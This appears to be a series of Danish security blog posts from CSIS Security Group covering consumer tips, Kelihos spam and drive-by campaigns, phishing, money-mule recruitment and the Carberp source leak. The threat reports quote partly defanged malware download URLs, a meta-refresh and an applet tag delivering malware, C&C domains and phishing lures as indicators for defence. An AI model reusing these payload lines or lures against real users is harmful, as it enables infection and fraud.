Her kommer 5 simple råd for at mindske risikoen for at få stjålet sit kreditkort på Internettet:

1) AUTOMATISK OPDATERING

Langt de fleste computere der bliver inficeret med den type virus, som blandt andet stjæler kreditkortoplysninger, skyldes at en bruger besøger en legitim hjemmeside, som er blevet hacket. De PC-brugere, der besøger en sådan hjemmeside, og som ikke har opdateret programmer som Java JRE, Flash og Adobe Reader, bliver helt automatisk inficeret.

Se mere om automatisk opdatering af programmer på www.heimdalagent.com

Du kan også hurtigt teste om din browser er opdateret her: https://www.botfrei.de/en/browsercheck/

2) BRUG DIN BANK

I Danmark tager de danske banker et kæmpe ansvar for at hjælpe dig som borger. Dels holder de øje med suspekte transaktioner og mystiske forbrugsmønstre. Derudover stiller de værktøjer til rådighed, som kan hjælpe dig med at identificere og til tider fjerne de aktuelle vira, der truer deres kunder.

3) VÆR OPMÆRKSOM OG BRUG DIN SUNDE FORNUFT

Phishing e-mails havner dagligt i danskernes indbakke og de IT-kriminelle bliver bedre og bedre til at lave dem og gjort troværdige. De IT-kriminelle er endda så nøje beregnende, at de tænker over, hvornår de udsender dem, så forbrugeren forventer at få en e-mail fra eksempelvis SKAT.

HUSK på, at hverken SKAT, din bank eller nogen andre legitime virksomheder, vil sende dig en e-mail, hvor de beder dig indtaste dine kreditkortoplysninger.

Flere af de vira, som forsøger at stjæle dine kreditkortoplysninger, forsøger også at manipulere din netbanks login side:

4) ANTI-VIRUS

AV-produkter er med rette blevet kritiseret for, ikke at kunne fange de mere lokale vira, som dem der går efter dine kreditkortoplysninger. Nå det er sagt, så er det naturligvis altid godt at have et AV-produkt, så længe man ved, at dette ikke kan stå alene.

Der findes en masse gode og gratis AV-produkter, her er et par eksempler: Avira, AVG, AVAST og Microsoft Essentials

5) BROWSER INDSTILLINGER

Der findes en lang række gode råd til at sikre din browser. Et af de simpleste og mest effektive i denne forbindelse er at indstille browseren til, at du skal bekræfte hver gang den forsøger at afvikle Java på din computer

European Nopsled Team har netop vundet de indledende runder til den anerkendte ctf-konkurrence Codegate YUT. Holdet – som bl.a. består af tre medarbejdere fra CSIS Security Group – var de eneste der formåede at løse alle rundens udfordringer og vandt derfor en plads til finalen. Derudover fik de også tildelt et beløb, som skulle hjælpe dem med at finansiere turen til Sydkorea, hvor finalen vil foregå første uge af april.

Codegate YUT er en prestigefyldt og anerkendt konkurrence på næsten samme niveau som DefCon, der er det uofficielle verdensmesterskab i hacking, hvorfor mange af de deltagende var de samme som tidligere set under DefCon.

”Vi er rigtig stolte af vores bestræbelser under de indledende runder – især fordi, vi faktisk var det eneste hold, der formåede at løse alle udfordringer, vi fik givet. Det var nogle dygtige modstandere, men heldigvis vandt vi… Og nu kan vi så glæde os til at komme til Sydkorea og kæmpe om pladsen til DefCon” fortæller holdmedlem Rasmus Petersen fra European Nopsled Team.

Vinderen af Codegate YUT i Sydkorea vil automatisk få en plads ved DefCon i Las Vegas og undgår således at skulle deltage i de kvalificerende runder. European Nopsled Team har derfor meget at vinde, når turen går til Sydkorea, men før nerverne rigtigt begynder at sætte sig, kan de glæde sig over årets første flotte resultater.

Som du har kunnet læse i de danske medier og her på hjemmesiden den sidste uges tid, da er antallet af inficerede computere i Danmark steget markant det sidste halve års tid. Og det er en tendens, sikkerhedseksperter landet over forventer, vil fortsætte.

I den forbindelse har CSIS Security Group i samarbejde med TV2 tilbudt et gratis scannings-værktøj, der tjekker, om din computer er inficeret. Scanneren har været utrolig populær, hvorfor vi nu efter flere henvendelser og ønsker fra brugere har opdateret værktøjet, så det også kan anvendes til maskiner såsom Windows 8 og Vista.

Så hvis du stadig er interesseret i at få scannet din computer for at se, om den er inficeret, kan du hente værktøjet ved trykke her.

Har du spørgsmål kan du kontakte vores Heimdal Team påsupport@heimdalagent.comeller besøge Heimdal på Facebook. Her kan du samtidig løbende få nyheder og information fra it-verden.

En bande it-kriminelle, som er koblet direkte til netbank indbrud i det meste af verden, samt andre typer online svindel, er på jagt efter muldyr i Danmark som kan anvendes til at modtage uautoriserede pengetransaktioner eller varer. Unødigt at understrege, at det er en meget dum ide at lade sig friste af den slags "gode tilbud"!

Vi har tidligere beskrevet risikoen ved at lade sig rekruttere som penge- eller pakkemuldyr på vores hjemmeside: http://www.csis.dk/da/csis/news/643/

De uønskede e-mails ankommer med følgende indhold:

Fra: [Spoofet afsender adresse]

Emnelinje: Re: CV [vilkårligt nummer]

Indhold:

If you have excellent administrative skills, working knowledge of Microsoft Office, a keen eye for detail, well-versed in the use of social networking sites such as Twitter and Facebook, are organized, present yourself well and are a team player with the ability to work independently, are reliable and punctual and can understand and execute instructions are determined to work hard and succeed - we need you.

If you are interested in this job, please, send us your contact information:
Full name:
Country:
City:
E-mail:

Please email us for details: [vilkårligt navn]@jobseuropenet.com

-

Det som gør at vi kan koble dette direkte til it-kriminelle, er, som vi tidligere har dokumenteret, domænet der anvendes til at svare tilbage til: jobseuropenet.com. Domænet anvender følgende navneservere:

ns1.penrils.com
ns2.penrils.com

Den deler samtidig plads med domænet:

euroconsulting-envia.com

- der ikke overraskende også anvendes i forbindelse med muldyrsrekruttering.

Vi kan direkte koble den pågældende navneserver til følgende andre domæner som man skal holde sig fra:

angelsphase.com
appleeipod.com
brightsunbeam.com
capitalmediaonline.com
ebayonlinetoday.com
elendegenerasworld.com
housemedicrepair.com
lastdayticket.com
slim365direct.com
summerkidsfun.com
thestartnew.com
tomhomeslisa.com

Alle domænerne er koblet direkte til en større operation, hvor der bl.a. sælges og distribueres elektronik købt online med høstede kreditkort oplysninger.

Navneserveren er registeret med følgende whois oplysninger:

Registrar:    DEERWOOD INVESTMENTS LLC
Whois Server:    whois.deerwood.name
Referral URL:    http://www.deerwood.name
Name Server:    NS1.PENRILS.COM
Name Server:    NS2.PENRILS.COM

Vi har blokeret de forskellige domæner, relateret til dette scam, i CSIS Secure DNS, hvorved også Heimdal PRO og corporate kunder er beskyttet.

AV-Test har publiceret resultatet af en test af antivirus software til Microsoft Windows 8. Testen er samtidig den første af sin slags til Windows 8 og sender Comodo, AhnLab og Microsoft i skammekrogen med de dårligste resultater. På toppen finder vi AVG og AVAST! som begge findes i gratis udgaver til det private slutbruger marked. Herudover - og som betalingssoftware - klarer også Bitdefender og Kaspersky sig udemærket. Bitdefender ender som topscorer.

Denne test fra AV-Test har fokus på det private slutbruger marked og i testen indgår 25 forskellige produkter. 

Det er værd at bemærke at Windows 8 kommer præinstalleret med Windows Defender, så uanset, opnår den almindelige slutbruger en bedre beskyttelse med Windows 8 end en traditionel Windows 7 eller ældre version af Microsoft OS uden antivirus.

Windows Defender ender ud med en baseline score på 11.5. Til sammenligning modtager Comodo Internet Security Premium 6.0 og AhnLab V3 Internet Security 8.0 en baseline score på 10.0. 

De to gratis løsninger fra AVAST! og AVG lander henholdsvis en score på 15.0 og 15.5 ud af 18. 

CSIS anbefaler at man sammen med sit antivirus program anvender Heimdal Security Agent. Denne sikkerhedsagent vil ikke alene beskytte mod skadelige websider men også forhindre virus i at blive plante på Windows ved at udnytte sårbarheder i populære tredjepartsprogrammer som Java JRE, Adobe Reader/Acrobat, Flash, Quicktime osv.  Du kan også hente Heimdal som en gratis løsning. Læs mere på vores heimdal side: https://www.heimdalagent.com/da/home.

Yderligere oplysninger:
http://www.av-test.org/en/tests/home-user/windows-8/janfeb-2013/

Kort tid efter at bomberne eksploderede i Boston, under det store årlige Marathon, og dræbte flere mennesker og sårede i hundredevis, kastede svindlere sig over falske indsamlinger og donationer til støtte for ofrene.

Det er særligt Twitter som er blevet misbrugt som afsæt for falske indsamlinger, men vi forventer at også at spammails vil blive brugt til at indsamle støttepenge, som alt andet lige vil, lande i de forkerte lommer.

Det er langt fra første gang at vi ser hjerteløse svindlere misbruge tragiske hændelser som denne til egen økonomisk vinding. Vi oplevede det i forbindelse med katastrofen på Haiti og tsunamien i 2004 som ramte det Indiske ocean.

Et billede af en konto på Twitter, som er oprettet med det formål at indsamle midler som lander i de forkerte lommer, findes herunder:


Bemærk at lokkemaden typisk er "for every retweet we receive we will donate $1.00 to the #BostonMarathon victims #PrayForBpston".

Hvis man  føler behov for at donere penge, så gør det via de kanaler man allerede kender og hjemmesider man har tillid til. Svindlere vil igen og igen forsøge at slå plat på andres tragier.

IT-kriminelle, som står bag det berygtende BOTnet Kelihos har siden i går aftes udsendt i tusindvis af spammails til vilkårlige e-mail adresser hvor lokkemaden er informationer om bombesprængningerne i forbindelse med Boston Marathon. Der anvendes forskelligt indhold og talrige BOTs som platform for infektionen som udnytter sårbarheder i bl.a. Java JRE.

Den uønskede e-mail ankommer med en emnelinje som f.eks.:

2 Explosions at Boston Marathon
Explosions at Boston Marathon
Aftermath to explosion at Boston Marathon
Video of Explosion at the Boston Marathon 2013

Indholdet:

[link til en kompromitteret BOT eller webside]

Se skærmdump herunder:


Hvis en modtager kan lokkes til at klikke på det medfølgende link vil man blive udsat for et drive-by angreb samt social engineering hvor man automatisk tilbydes filen "boston.avi_______.exe". Denne fil er en Kelihos variant som ved kørsel vil binde maskinen ind i det centrale BOTnet.

Filen som tilbydes kommer via en "meta refresh" (mellemrum indlagt af CSIS):

<meta http-equiv="refresh" content="60; url=http://188.2.1 64.112/boston.avi_______.exe">

Der er flere andre sider som tilbyder denne malware (mellemrum indlagt af CSIS):

http://178.1 37.120.224/boston.avi_______.exe
http://118.1 41.37.122/boston.avi_______.exe
http://95.69 .141.121/boston.avi_______.exe
http://85.19 8.81.26/boston.avi_______.exe

At der anvendes en lang liste af BOTs til at føde maskiner med den skadelige kode kan ses herunder (kort udsnit - mellemrum indlagt af CSIS)

http://37.229.92.116/boston.html
http://62.45.1 48.76/boston.html
http://178.13 7.120.224/news.html
http://188.2. 164.112/boston.html
http://190.24 5.177.248/boston.html
http://212.7 5.18.190/boston.html
http://46.23 3.4.113/boston.html
http://217.14 5.222.14/boston.html
http://219.19 8.196.116/news.html
http://24.180 .60.184/boston.html
http://24.214 .242.227/boston.html
http://109.87 .205.222/news.html
http://85.198 .81.26/news.html
http://85.204 .15.40/boston.html
http://91.241 .177.162/boston.html
http://94.153 .15.249/boston.html
http://94.28. 49.130/boston.html

Websiderne indeholder alle enten "boston.html" eller "news.html" samt den binære kode "boston.avi_______.exe".

Kelihos forbinder sig til flere C&C servere, som anvendes til at plante yderligere malware på maskinerne eksempelvis (mellemrum indlagt af CSIS):

ahf apjux.ru
cyl aktog.ru
fub kimab.ru
goj zawde.ru
ick yrjum.ru
low zepol.ru

Den sekundære payload i dette angreb er en klassisk ransomware som kidnapper ofrets data og herefter tvinger denne til at indbetale en løsesum via PaySafeCard.

Selve drive-by angrebet udføres ved brug af det kommercielle exploitkit RedKit. Der udnyttes bl.a. svagheder i Oracle Java JRE (mellemrum indlagt af CSIS):

http://liquidrealit ysolutions.com/gjc.jar

Blandt øvrige drive-by sider/domæner kan nævnes (mellemrum indlagt af CSIS):

http://www.apay aosvss.us
http://www.care coctrr.us
http://www.sacr addrtorch.us
http://godd amsel.org
http://techpour ri.com
http://dotn ax.com
http://abog adojuliorivera.com

Det pågældende Java arkiv vil tvangsfodre den pågældende maskine med Kelihos hvis Java JRE ikke er behørigt opdateret.

Vi har blokeret alle disse domæner samt flere end 30 andre i CSIS Secure DNS. Det betyder også at alle brugere af Heimdal PRO eller corporate (https://heimdalagent.com) er beskyttet mod den skadelige payload.

Udover at spamme disse e-mails ud anvendes også blackhat SEO tricks. Det betyder at personer, som eksempelvis søger på Google efter nyheder eller videoer af terrorangrebet i Boston kan lande på en af mange forskellige kompromitterede websider. Et blackhat SEO er følgende tekst: "Videos of Explosions at the Boston Marathon 2013". Disse sider peger på en drive-by side som misbruger Blackhole exploitkittet.

Antivirus detektion af den seneste Kelihos downloader opnår følgende result:

Antivirus    Result    Update
Agnitum     -     20130416
AhnLab-V3     -     20130416
AntiVir     -     20130417
Antiy-AVL     -     20130417
Avast     -     20130417
AVG     -     20130417
BitDefender     Trojan.GenericKDZ.14575     20130417
ByteHero     -     20130415
CAT-QuickHeal     -     20130417
ClamAV     -     20130417
Commtouch     -     20130417
Comodo     -     20130417
DrWeb     -     20130417
Emsisoft     Trojan.GenericKDZ.14575 (B)     20130417
eSafe     -     20130415
ESET-NOD32     -     20130416
F-Prot     -     20130416
F-Secure     Trojan.GenericKDZ.14575     20130417
Fortinet     W32/Kryptik.X!tr     20130417
GData     Trojan.GenericKDZ.14575     20130417
Ikarus     Trojan.SuspectCRC     20130417
Jiangmin     -     20130417
K7AntiVirus     -     20130416
K7GW     -     20130416
Kaspersky     HEUR:Trojan.Win32.Generic     20130417
Kingsoft     -     20130415
Malwarebytes     Malware.Packer.EGX7     20130417
McAfee     -     20130417
McAfee-GW-Edition     Heuristic.LooksLike.Win32.Suspicious.E     20130417
Microsoft     -     20130417
MicroWorld-eScan     Trojan.GenericKDZ.14575     20130417
NANO-Antivirus     -     20130417
Norman     -     20130416
nProtect     -     20130417
Panda     Suspicious file     20130416
PCTools     HeurEngine.MaliciousPacker     20130417
Sophos     -     20130417
SUPERAntiSpyware     -     20130417
Symantec     Packed.Generic.402     20130417
TheHacker     -     20130416
TotalDefense     -     20130416
TrendMicro     -     20130417
TrendMicro-HouseCall     TROJ_GEN.F47V0417     20130417
VBA32     -     20130416
VIPRE     -     20130417
ViRobot     -     20130417

Fra Terrorangreb i Boston til eksplosionen i gødningsfabrikken i nærheden af Waco i Texas. Kelihos har skiftet fluepapir og lokker nu med video optagelser af eksplosionen. Fremgangsmåden er identisk med terrorangrebet i Boston og den pågældende spammail indeholder blot et link til en kompromitteret webside som indeholder en stribe IFRAMES der peger på Youtube (se vedhæftede skærmdump), men som samtidig også peger på en drive-by side som udnytter sårbarheder i populære tredjepartsprodukter.

Den nye kampagner ankommer med følgende indhold:

Fra: [Spoofet / forfalsket afsender adresse]

Emnelinje:

Waco Explosion HD
CAUGHT ON CAMERA: Fertilizer Plant Explosion
Texas plant explosion Fertilizer Plant Explosion Near Waco, Texas West Tx Explosion

Indhold [link til en kompromitteret webside]

(mellemrum indlagt af CSIS - eksempelvis)

http://78.9 0.213.244/news.html
http://110.9 2.80.47/texas.html
http://178.1 37.120.224/news.html
http://182.2 35.147.164/news.html


Denne flytter brugeren videre mod drive-by siden (mellemrum indlagt af CSIS)
http://bestdog houseplans.com/azsq.html

Drive-by siden udnytter svagheder i bl.a. Java JRE og forsøger at fodre maskinen med en særligt udformet java arkiv (.jar).

<html><body> <td>Unexpected Error. Please, try again later.</td>
<applet code="Code.class" name="pazsfiu" archive="op7.jar">

Hvis Java JRE ikke er behørigt opdateret vil Kelihos blive kopieret til maskinen som dernæst vil downloade et kidnapningsprogram.


Vi har blokeret flere af disse websider i CSIS Secure DNS, ligesom vi beskytter mod drive-by angrebet i Heimdal corporate og PRO.

En gruppe af de førende europæiske it-sikkerhedsfimaer har dannet et konsortium der kan imødekomme den stigende trussel mod Europas sikkerhed. Danske CSIS Security Group er nu en del af det største uafhængige cyberforsvar kaldet European Cyber ​​Security Group (ECSG), der til sammen kan stille mere end 600 eksperter til effektivt at bekæmpe cyberkriminalitet, når private og offentlige organisationer oplever IT-sikkerhedsbrist.

ECSG er et privat konsortium dannet på baggrund af det stigende behov for øget samarbejde på tværs af grænserne til at imødegå de voksende trusler mod Europas internetsikkerhed. De stiftende medlemmer af ECSG omfatter danske CSIS, hollandske Fox-IT, franske Lexsi og spanske S21sec.

"I dag er organisationer tvunget til at håndtere vidt forskellige trusler, der spænder fra datalækager til DDoS-angreb. I CSIS er vi stolte af at være en del af et helt nyt samarbejde, hvor vi tilbyder vores ekspertise til virksomheder i hele Europa i kampen mod cyberkriminalitet", udtaler Allan Mortensen, adm. direktør i CSIS Security Group.

Mens alle lande i Europa har et agentur dedikeret til missionen om at sikre sine elektroniske grænser er samarbejde mellem landene sjældent, hvilket gør det endnu vanskeligere at beskytte borgerne og retsforfølge gerningsmænd. ECSG søger at løse dette gennem en kombination af partnerskaber og samarbejder, og en samlet stærk styrke af mere end 600 it-sikkerhedseksperter, således at man kan reagere på en hurtig og effektiv måde. Ved at håndtere Computer Emergency Response Team (CERT) engagementer som partnerskaber, tilfører virksomhederne hver deres unikke kompetencer der kan bidrage til en hurtigere og mere komplet agil service, som en enkeltstående stor organisation ikke ville kunne tilbyde.

Desuden kan ECSG udnytte sin front-line ekspertise og viden til at rådgive regeringer, virksomheder og andre relevante instanser om mere effektive og praktiske cyber forsvarspolitiske spørgsmål, risikoforebyggelse og mitigeringspraksisser samt vidensdeling på tværs af grænser. På sådan vis mindskes virkningerne af cyberkriminalitet i hele Europa.

Key facts

• Gennem deres partnerskaber er ECSG nu reelt den største europæiske udbyder af CERT-tjenester. Ved at tackle CERT opgaver i fællesskab tilbyder ECSG den mest omfattende og agile service til erhvervskunder såvel som offentlige kunder. Medlemmerne arbejder selvstændigt, og kan trække på yderligere og specialiserede ressourcer fra deres ECSG partnere, hvor og når det er nødvendigt.
• I overensstemmelse med de lovgivende regler, vil ECSG partnere fortroligt udveksle præcise og hurtige oplysninger og information om trusler og trends, uafhængigt af det bureaukrati, der normalt ville forekomme på grund af lovmæssige spørgsmål tværs grænserne. Sådanne oplysninger vil også blive delt med regeringskontorer for at fremme de bestræbelser regionale retshåndhævende instanser foretager i kampen mod internetkriminalitet.
• ECSG vil desuden samarbejde med de enkelte landes regeringer, samt Den Europæiske Union, og rådgive om best practise samt bistå på it-sikkerhedsopgaver hvor det er nødvendigt at sikre hurtig håndtering af sikkerhedsspørgsmål.
• Endelig vil ECSG fokusere på EU lovgivere og ønsket om at lovgivning kan lette informationsudveksling og samarbejde på tværs af grænser, der i sidste ende vil føre til et mere sikkert Europa.
• Medlemskaber til ECSG er åbne, men genstand for en fuld gennemgang. For mere information, besøg http://www.cybersecuritygroup.eu

Truslen fra såkaldte botnets vokser med en hidtil uset hastighed og for et par hundrede dollars kan enhver skabe sit eget. Det seneste år har CSIS Security Group dokumenteret en markant stigning – også i Danmark, hvor inficerede computere med informationstyven Torpig alene er steget med 529%.

CSIS har nu allieret sig med det tyske Anti-Botnet Advisory Centre i kampen mod udbredelsen af ​​botnet-inficerede computere i Tyskland, der er særligt hårdt ramt af bank trojaneren Patcher (Multibanker, Bankpatch). På sådan vis mindskes de it-kriminelles fundament.

Tyskland var det første land i Europa til at lancere et storstilet anti-malware projekt, Anti-Botnet Advisory Centre, der blev bakket op af både regeringen, internetudbydere og sikkerhedsfirmaer. Den ansvarlige part er eco (Association of the German Internet Industry), der nu samarbejder med danske CSIS, som primært er kendt for sin rådgivning af statslige instanser og bekæmpelsen af eCrime i samarbejde med finansielle institutioner verden over.

Den primære årsag til en botnet-infektion, der bl.a. lader it-kriminelle stjæle penge fra borgernes bankkonti samt misbruge computerne til DDoS angreb som vi så det med NemID i april måned, er ikke-opdaterede tredjepartsprogrammer. CSIS har udviklet Heimdal Security Agent, der automatisk opdaterer de mest udnyttede programmer, og således beskytter computeren. Heimdal anvendes i dag af borgere i 67 lande, og søges nu udbredt mere markant i Tyskland.

Om Heimdal:
www.heimdalagent.com

Om Anti-Botnet Advisory Centre:
https://www.botfrei.de

For yderligere information kontakt venligst:

CSIS Security Group:

Jan Kaastrup

jka@csis.dk / +45 88 13 60 30

Anti-Botnet Advisory Centre:

Thorsten Kraft

thorsten.kraft@eco.de / +49 221 7000 48 195

Et stort antal danskere er blevet fisket på Twitter og som konsekvens misbruges deres konto nu af en "spamBOT" til at udsende samme besked til andre Twitter konti, hvor målet også er at fiske passwords fra dem.

Kampagne manifesterer sig med en besked sendt fra en kompromitteret konto;

"You've GOTTA See this! LOL [link til URL forkorter]"

Trafikkæde gengivet herunder:

http://t.co/iqn0chzacW
--> rxti.al til.ru
--> tpw itter.com/rdmu8
--> /tpw itter.com/zdu70/verify/?&account_secure_login

Andre variationer af den besked, som et offer vil Twitte, findes herunder:

"Did you see this tweet of you? [link til URL forkorter]"
“Funny picture of you [link til URL forkorter]"

Landingsiden er hostet i Kina og er en kopi af din Twitter login side. Hvis du på denne falske Twitter side opgiver dit brugernavn og passwords vil din konto blive indrullet i en spamBOT der automatisk logger ind som dig og derfra spammer alle venner og bekendte.


SpamBOTten anvender en IRC kanal som også bruges til at opdatere de beskeder og links der udsendes til andre Twitter brugere fra den fiskede/kompromitterede konto.

CSIS har blokeret alle domænerne i CSIS Secure DNS og beskytter derved mod denne kampagne. Det gælder også for alle brugere af Heimdal PRO og Corporate.

Hvis du har opgivet dit brugernavn og password skal du med det samme skifte det!

I tæt samarbejde med PwC har CSIS som de første i Skandinavien fået etableret en konference med 100% fokus på cybercrime og den voksende undergrundsøkonomi. Scandinavian Cybercrime Conference 2013 har allerede tiltrukket de førende kompetencer fra ind- og udland, der vil dele ud af deres erfaringer med konkrete trusler, risk management, krisehåndtering mm.

Blandt talerne finder du blandt andre:

* Troels Ørting, Head of European Cyber Crime Centre  
* Steve Durbin, Global Vice President, Information Security Forum
* Thorsten Kraft, Senior Manager, Anti-Botnet Advisory Centre 
* David Sancho, Senior Anti-Malware Researcher, Trend Micro

Det er den ideelle mulighed for store og mellemstore virksomheder i Skandinavien til at få viden om den voksende trussel, samt hvordan den kan migreres og minimeres.

Scandinavian Cybercrime Conference afholdes tirsdag d. 18. Juni 2013, 8.30-15.30, hos PwC på Strandvejen 44, 2900 Hellerup.

For at kunne sikre deltagerne nyttig information har vi som noget nyt opdelt konferencens indlæg i to spor; et forretningsperspektiv samt et teknisk perspektiv på cybercrime.

Rygtet har dog allerede spredt sig, og konferencen har rundet de 100 tilmeldte, men der er stadig ledige pladser. Det er gratis at deltage.

Yderligere oplysninger, agenda og tilmelding her

Inden for de seneste fem år er der sket næsten en fordobling i antal stalkede personer i Danmark. I alt har knap 10% af alle danskere oplevet at være blevet systematisk og vedvarende forfulgt og chikaneret (jf. rapport af Justitsministeriet februar 2013). En af de anvendte stalkingmetoder er overvågning via den udsattes computer. Dansk Anti-Stalking Forening blæser nu til kamp mod den tendens, og har derfor indgået samarbejde med it-sikkerhedsspecialisterne i CSIS Security Group A/S.

Stalking kan ramme enhver, og især ses det blandt hyppige brugere af medier og digitale apparater. Ved et målrettet angreb mod en computer, kan en stalker få adgang til den udsattes personlige oplysninger såsom e-mails, facebook, linked-in, billeder, webcam og mikrofon. Mange af de vira der findes i dag har alle disse overvågningsmuligheder, men der kan også være tale om udnyttelse af helt almindelige administrationsprogrammer, de såkaldte RATs, som er legitime programmer, der anvendes af mange virksomheder til kundesupport.

”Desværre har politiet begrænsede ressourcer, når en borger henvender sig med en mistanke om, at computeren overvåges. Det gør, at der er lang behandlingstid på sagerne, hvilket kan være til stor frustration for en person, der er udsat for en stalker.” udtaler Lise Linn Larsen, Formand for Dansk Anti-Stalking Forening.

Stalkingudsatte har nu mulighed for selv at tjekke, om computeren nu også er så privat som den gerne skulle være - og samtidig sikre den fremadrettet mod uønsket overvågningssoftware. Det sker i en ny kombination af CSIS’ egenudviklede software; sikkerhedsprogrammet Heimdal, som anvendes privat i 70 lande verden over, og scanningsværktøjet Computer Incident Response Kit (CIRK). CIRK anvendes i dag til bankkunder verden over, der har fået inficeret deres computer. Programmet finder således både illegale og legale programmer, der kan have kompromitteret en computer. De scanningsværktøjer, der kan downloades gratis på nettet, detekterer ikke denne type software.

”Vi ved, at politiet er travlt optaget med denne type sager, da vi ofte selv får henvendelser fra borgere, der er nervøse for sikkerheden på deres computer. Nu har de mulighed for selv at gøre noget – uden at skulle betale dyre domme for det hos en it-specialist. Det letter samtidig arbejdet for politiet, og speeder processen op, da de får leveret alle de nødvendige data med det samme.” udtaler Jan Kaastrup, Teknisk Direktør i CSIS.

Heimdal Pro kan hentes her: https://www.heimdalagent.com/da/antistalk

Herefter udleveres CIRK ved henvendelse til CSIS support på support@csis.dk

Yderligere info fås ved henvendelse til:

Lise Linn Larsen

Dansk Anti-Stalking Forening

post@anti-stalking.dk / +45 21 95 40 04

www.anti-stalking.dk

Skandinaviens første dedikerede konference med fokus på Cybercrime og det voksende undergrundsmarked har opnået så omfattende interesse at vi har set os nødsaget til at lukke for flere tilmeldinger til det tekniske spor.

Der er fortsat ganske få pladser på forretningsperspektivet, så det er først til mølle. Personer, som fra i dag tilmelder sig det tekniske spor, vil blive placeret på en venteliste ved at kontakte PwC (se link til konferencens webside).

"Vi er naturligvis stolte og glade over, at konferencen kan tiltrække op mod 200 mennesker fra landets største og it-sikkerhedsbevidste virksomheder", siger Partner Morten Villkjær fra CSIS Security Group og fortsætter "det viser at interessen for dette tema er stort og at agendaen med mange spændende talere fra ind og udland har ramt et behov hos mange".

Du kan læse mere om konferencen og se agendaen på adressen:
http://www.pwc.dk/da/arrangementer/cybercrime_2013.jhtml

Vores indbakker bliver dagligt ramt af e-mails med overskrifter som:

• This Alert is a Traders Dream
• This little stock is on steroids
• What A Great Start We`ve Had! Watch-list Inside
• They`re going to Explode like Champagne
• IT MAKES A MOVE!

Fælles for dem alle er, at de forsøger at lokke modtageren til at købe aktier i et lille firma ved at promovere det meget positivt. I dette tilfælde drejer det sig om et lille medicinalfirma fra Clearwater, Florida ved navn Biostem.us.

På en 6 måneders oversigt er det tydeligt at se udviklingen i aktieopkøb, og samtidig kan man nærmest følge spamkampagnen i real-tid.

"Pump-and-dump"-affærer går ud på at blæse en virksomheds aktier (typisk små, såkaldte "microcap" virksomheder) op ved hjælp af falske og vildledende postulater.

Før i tiden var det almindeligt at sprede disse falske påstande ved at phonere (eller telefonsælgere) ringede op til tilfældige numre og pustede en stemning op omkring køb af aktier. Det bliver også kaldt sidegadevekselerer og kunne være en langvarig affære, hvor der skulle bruges store ressourcer på at opbygge et tillidsforhold til ofret. I internettets tidsalder er det i sagens natur blevet meget nemmere at nå ud til det brede publikum på sociale medier via spam kampagner samt på opslagstavler og i chatrum.

Svindlerene opfordrer til hurtigt (inden ofret når at tænke sig om) at købe en aktie eller sælge før prisen går ned. Ofte vil initiativtagerne hævde at have "insider-oplysninger" om en forestående udvikling eller at have en "ufejlbarlig" kombination af økonomisk- og aktiemarkeds-data til at udvælge aktier.

Omtale af Biostems aktieudvikling på webside for private aktiehandlere. Det er min opfattelse at brugeren 'michael243' er (muligvis uvidende om svindelnummeret) medejer Dr Michael Markou, D.O og brugeren 'The_Insider_22' er spammeren.

I virkeligheden kan de være betalte promotore – eller folk der selv ejer store mængder aktier, der står til at vinde ved at sælge deres aktier efter aktiekursen er "pumpet" op af de vilde opkøb, de skaber. Når disse svindlere "dumper" deres aktier og stopper hysteriet, falder prisen typisk, og investorerne mister deres penge.

En undersøgelse af 75.000 uopfordrede e-mails sendt mellem januar 2004 og juli 2005 konkluderede, at spammere kunne få et gennemsnitligt afkast på 4,29% ved hjælp af denne metode, mens modtagere som handler på spam-mailen typisk taber tæt på 5,5% af deres investering inden for to dage.

Hvor kommer alle disse mails fra?

De bliver spammet ud fra et botnet kaldet Kelihos. Netværket trak store overskrifter efter Boston Marathon eksplosionen og ligeledes efter eksplosionen i Texas hvor der skete en dramatisk udvidelse af deres botnet.

Når en bot bliver instrueret til at afsende spammails henter den sin skabelon og modtager-adresser fra en proxy/dron i netværket:

GET /[%vilkårlig streng%].htm HTTP/1.1
Host: [IP adresse fra en dron i netværket]
Content-Length: 1320 (vil variere)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2a1pre) Gecko/20090403 Firefox/3.6a1pre

%krypteret data%

HTTP/1.1 200

Server: Apache
Content-Length: (længe baseret på indhold af spam skabelon)
Content-Type:
Last-Modified: X
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Sun, 23 May 2013 X
Last-Modified:Sun, 23 May 2013 X
Accept-Ranges:bytes

%krypteret data%

Kelihos er i spambot klassen, men er også i stand til at stjæle brugernavn og passwords samt at installere yderligere malware. Den benytter sig af fast flux teknologi, men for at det ikke skal være løgn, så benytter den også Navneserver fastfluxing. Dette kaldes teknisk set ”double-flux” og gør netværket utroligt svært at lukke ned – der er hverken DNS- eller webserver.

Vi har blokeret en omfattende liste af domæner, som anvendes af Kelihos, i CSIS Secure DNS.

I sidste uge begyndte rygter at cirkulere om at kildekoden til crimekittet kendt som "Carberp" var blevet lækket på nettet. Men koden var beskyttet i en krypteret zip-fil, så det har ikke før nu kunne bekræftes hvorvidt lækagen var ægte. En situation meget lig da kildekoden til ZeuS blev publiceret.

CSIS har undersøgt sagen yderligere og kan nu bekræfte, at vi har fast i den komplette kildekode til Carberp crimekittet og at koden kan kompileres og virker præcist som beskrevet i de tekstfiler som er inkluderet i pakken. Indholdet omfatter også det nyere Carberp bootkit sammen med andre kildekoder, til hvad der ligner Stone bootkit, Citadel, ZeuS og Ursnif. Pakken undergår i øjeblikket en nærmere analyse. Vi har også fundet flere tekst filer, der tilsyneladende indeholder private chats og forskellige brugernavne og adgangskoder til flere FTP-servere. Det skal også undersøges videre ...

Som med lækket af ZeuS kildekoden tilbage i maj 2011 (https://www.csis.dk/en/csis/blog/3229/), betyder det at it-kriminelle har alle chancer for at ændre og endda tilføje nye funktioner til sættet. I 2011 forudsagde vi et enormt boost blandt kommercielle crimekits baseret på ZeuS koden, hvilket desværre har vist sig at holde stik som med fx IceIX og Citadel.

ZIP-arkivet har følgende egenskaber::
Størrelse: 2.015.529.409 bytes (2gb)
MD5: 510666843544b66bf67a9b3d739d2f56

Arkivet er beskyttet med en adgangskode, som blev offentliggjort i går.

Et par screenshots fra pakken og selve Carberp builder nedenfor:

Carberp builder i aktion:

I løbet af formiddagen har mange vilkårlige danske e-mail adresser modtaget en trusselmail som foregiver at komme fra "lejemorder" bestilt til at slå dig ihjel.

Du skal som "mål" for denne lejemorder betale penge for at "slippe af krogen". Og det er hele formålet med den yderst truende og ubehagelige e-mail kampagne!

